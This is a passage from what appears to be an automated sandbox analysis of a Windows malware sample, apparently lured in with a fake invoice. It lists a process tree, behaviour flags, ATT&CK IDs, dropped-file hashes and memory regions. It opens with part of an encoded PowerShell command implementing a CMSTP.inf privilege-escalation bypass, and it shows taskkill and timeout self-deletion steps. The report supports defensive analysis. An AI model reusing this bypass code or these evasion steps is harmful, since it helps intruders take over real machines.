AZQBzAHMAewAkAGgAdwBuAGQAPQBHAGUAdAAtAEgAdwBuAGQAIAAtAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgACQATgBhAG0AZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABIAHcAbgBkADsAWwBpAG4AdABdACQAaABhAG4AZABsAGUAPQAkAGgAdwBuAGQAOwBpAGYAKAAkAGgAYQBuAGQAbABlACAALQBnAHQAIAAwACkAewBbAHYAbwBpAGQAXQBbAFcAUABJAEEALgBDAG8AbgBzAG8AbABlAFUAdABpAGwAcwBdADoAOgBQAG8AcwB0AE0AZQBzAHMAYQBnAGUAKAAkAGgAYQBuAGQAbABlACwAWwBXAFAASQBBAC4AQwBvAG4AcwBvAGwAZQBVAHQAaQBsAHMAXQA6ADoAVwBNAF8AQwBIAEEAUgAsADEAMwAsADAAKQB9ACQAaABhAHMAaAA9AEAAewBQAHIAbwBjAGUAcwBzAD0AJABOAGEAbQBlADsASAB3AG4AZAA9ACQAaAB3AG4AZAB9ADsATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUABzAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIAAkAGgAYQBzAGgAfQB9ADsALgAgAFMAZQB0AC0ASQBOAEYARgBpAGwAZQA7AGEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBJAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjAG0AcwB0AHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAvAGEAdQAgACIAIgAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACIAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABNAGkAbgBpAG0AaQB6AGUAZAA7AGQAbwB7AH0AdQBuAHQAaQBsACgAKABTAGUAdAAtAFcAaQBuAGQAbwB3AEEAYwB0AGkAdgBlACAAYwBtAHMAdABwACkALgBIAHcAbgBkACAALQBuAGUAIAAwACkAfQANAAoA
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\50noyfha\50noyfha.cmdline"
8⤵
PID:1396

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5FC3.tmp" "c:\Users\Admin\AppData\Local\Temp\50noyfha\CSCAE288ACE5B4C4D49ACF6DFA0E7441AAA.TMP"
9⤵
PID:4484

C:\Windows\system32\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
8⤵
PID:1776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3512

C:\Users\Admin\AppData\Roaming\build.exe
C:\Users\Admin\AppData\Roaming\build.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD32E.tmp.bat
2⤵
PID:3412

C:\Windows\SysWOW64\chcp.com
chcp 65001
3⤵
PID:3836

C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 3904
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
3⤵
- Delays execution with timeout.exe
PID:1212

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:424

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
38f0f14cc7ca72ad51216866e66efb4e

SHA1
34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

SHA256
668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

SHA512
4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fc28168b916bf9744961653d503e1164

SHA1
71deadab13b81a414582f931e9af010152463644

SHA256
a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9

SHA512
08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\50noyfha\50noyfha.dll
Filesize
3KB

MD5
e5b5b8f8be59093be25c410ed73eb315

SHA1
af180184c73ef82b79810bf6da26e3b5c5893a9b

SHA256
898d8468c74c775a6992e9271e653e27178522e74331f69bf9fc498942807818

SHA512
2205675abc468ca8d2629cc8ae5817ff0e870366a5533ea37b4bbc4bfdac611bb2ce4832aeefb85414ba025da88c72a620bbde4212e73786ec9ed2f491848d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf
Filesize
556B

MD5
080cdba797fc2807d89ee8be462b2052

SHA1
4b3b1afbe4891de3fc5ec154c2506453da904319

SHA256
e12e9724598a6f91fd0930c12f767c114e491a1c26ef69b2a285297a8a55662c

SHA512
c842d28868b5532d23417f8eb269e6179952c89a50bf15347f8b5509503c383c7c8c98484a956f2ed2993919df810698f4534658a8cac37da2462da5cbb741ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5FC3.tmp
Filesize
1KB

MD5
c1a7a2480724b1c45eafcf581a24457f

SHA1
a1c434118a4d96734a24b6d4e52caa1b4e1599ac

SHA256
1acf876e77471da9024a99253de93df45b1b44f76bcdbf00a7290f58006951a1

SHA512
9cb532f32695b6704e4e40ee81af871d357ade18a4da48c1080190ced5595566beeb729cb2a569d4ed047010f0ad86daac7e128f14cab0a1857fa1ae8a081f2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD32E.tmp.bat
Filesize
57B

MD5
3aeb283f281646531d7cbed9a9e3d15f

SHA1
8f9582c14572cabd335596173142daa0c8b39d93

SHA256
18c3107f7355470e135f804173d537ae96bdadd7651c47ed3327a28cd0305c56

SHA512
b67993b8b59170d3c76d9abce9b9e3ec5959cfd037f214e2ca8fe85dfc7022d2ea679e10a26d097d7725985c2ce8db8bf69f8e25195dd38032159e639fedeb9e

Download Submit
C:\Users\Admin\AppData\Roaming\build.exe
Filesize
4.7MB

MD5
f9679fc0f620b8cf7c1f323597296e16

SHA1
805b889dccaa4b3cf2d3c8d429609ad6514bcae2

SHA256
fdd0e85704d970f1f01631da2e2fe39967a38a2bea06453717ba14c875288850

SHA512
19de7df05b3ea73bab509fbb5882c5552e013a0791b78e2db1fabcbd522eb3c8d28d924e95227bd4de6267251955e971ee9e7a0bd4bd0f9d1fe3e601fdd9a669

Download Submit
C:\Users\Admin\AppData\Roaming\build.exe
Filesize
4.7MB

MD5
f9679fc0f620b8cf7c1f323597296e16

SHA1
805b889dccaa4b3cf2d3c8d429609ad6514bcae2

SHA256
fdd0e85704d970f1f01631da2e2fe39967a38a2bea06453717ba14c875288850

SHA512
19de7df05b3ea73bab509fbb5882c5552e013a0791b78e2db1fabcbd522eb3c8d28d924e95227bd4de6267251955e971ee9e7a0bd4bd0f9d1fe3e601fdd9a669

Download Submit
C:\Users\Admin\AppData\Roaming\payment-invoice.pdf
Filesize
93KB

MD5
1b33bb7a4d019cb7da40475ae37801fe

SHA1
a047c4db8cccf7396e8f88bba43a1a224d84e23c

SHA256
fcb511cf5f2116cd4db4845150e21c01f3cf50afe78ebf864a185b6be7be69c6

SHA512
6596c3bad28be3caa16f9444732b53c9335286ccfff43366dbc984672dcc5bb853d4b12a4ddf1dd8fdbe7237ebc11ad5aafe2d8be5de029428f5c3e66b9d4c8d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\50noyfha\50noyfha.0.cs
Filesize
268B

MD5
7fbb3f2ac5a0040e7e42f8fc7cd6fbfe

SHA1
93fcde99bba753677f8786fbcdba4d695296bd12

SHA256
d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2

SHA512
3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\50noyfha\50noyfha.cmdline
Filesize
369B

MD5
539904bf9e1d909a5f5db736907f5712

SHA1
4592ef8e8ac84a2127a7f788d3c9dee1528c0dc2

SHA256
b4e063a803292eb683f498cf919191eef878336d387b708722f424a8464c4d30

SHA512
236dd3135e3e17765dfe21fd53e603e7488f26b934617f981e125849b0f51d889948fecc248ffe32a8feb0b74c292607b502eff80d2ccd92e6fc0db183d55046

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\50noyfha\CSCAE288ACE5B4C4D49ACF6DFA0E7441AAA.TMP
Filesize
652B

MD5
a9d45cb04d31ce84c97cfba525b5b405

SHA1
ac4fca99fd1e1f142b6295aa559933322aa7e6f8

SHA256
a39d28644d6d8cd5bd50d0c3754e5fba91f01fc5f49724b7a9a4e3f0be622505

SHA512
366883783f202a187547f11829207023bcf2e93780fd882ec764c450544a3b5547422b3e2dbfbf706b5b7ba7745a07db33f5ba65a38b77e233d285c6c6b9308e

Download Submit
memory/372-177-0x0000000000000000-mapping.dmp

Download
memory/372-190-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/372-181-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/664-132-0x0000000000000000-mapping.dmp

Download
memory/664-152-0x00007FF984830000-0x00007FF9852F1000-memory.dmp

Filesize
10.8MB

Download
memory/664-133-0x00000203B3A00000-0x00000203B3A22000-memory.dmp

Filesize
136KB

Download
memory/664-135-0x00007FF984830000-0x00007FF9852F1000-memory.dmp

Filesize
10.8MB

Download
memory/756-150-0x0000000000000000-mapping.dmp

Download
memory/1212-207-0x0000000000000000-mapping.dmp

Download
memory/1396-180-0x0000000000000000-mapping.dmp

Download
memory/1776-188-0x0000000000000000-mapping.dmp

Download
memory/2376-140-0x0000000000000000-mapping.dmp

Download
memory/3084-143-0x0000000000000000-mapping.dmp

Download
memory/3084-147-0x0000026AFF4F0000-0x0000026AFF534000-memory.dmp

Filesize
272KB

Download
memory/3084-146-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/3084-194-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/3084-153-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/3084-148-0x0000026AFF5F0000-0x0000026AFF666000-memory.dmp

Filesize
472KB

Download
memory/3412-203-0x0000000000000000-mapping.dmp

Download
memory/3512-137-0x0000000000000000-mapping.dmp

Download
memory/3512-142-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/3688-169-0x0000000000000000-mapping.dmp

Download
memory/3692-172-0x0000000000000000-mapping.dmp

Download
memory/3704-164-0x0000000000000000-mapping.dmp

Download
memory/3836-205-0x0000000000000000-mapping.dmp

Download
memory/3904-195-0x0000000000630000-0x00000000010F0000-memory.dmp

Filesize
10.8MB

Download
memory/3904-201-0x0000000005C10000-0x0000000005C76000-memory.dmp

Filesize
408KB

Download
memory/3904-209-0x0000000077C70000-0x0000000077E13000-memory.dmp

Filesize
1.6MB

Download
memory/3904-208-0x0000000000630000-0x00000000010F0000-memory.dmp

Filesize
10.8MB

Download
memory/3904-193-0x0000000000630000-0x00000000010F0000-memory.dmp

Filesize
10.8MB

Download
memory/3904-202-0x0000000077C70000-0x0000000077E13000-memory.dmp

Filesize
1.6MB

Download
memory/3904-196-0x0000000077C70000-0x0000000077E13000-memory.dmp

Filesize
1.6MB

Download
memory/3904-199-0x0000000000630000-0x00000000010F0000-memory.dmp

Filesize
10.8MB

Download
memory/3904-200-0x0000000000630000-0x00000000010F0000-memory.dmp

Filesize
10.8MB

Download
memory/4064-175-0x0000000000000000-mapping.dmp

Download
memory/4100-159-0x0000000000000000-mapping.dmp

Download
memory/4384-206-0x0000000000000000-mapping.dmp

Download
memory/4384-134-0x0000000000000000-mapping.dmp

Download
memory/4484-184-0x0000000000000000-mapping.dmp

Download
memory/4528-149-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/4528-144-0x00007FF983F10000-0x00007FF9849D1000-memory.dmp

Filesize
10.8MB

Download
memory/4528-141-0x0000000000000000-mapping.dmp

Download
memory/4816-156-0x0000000000000000-mapping.dmp

Download
memory/5100-154-0x0000000000000000-mapping.dmp

Download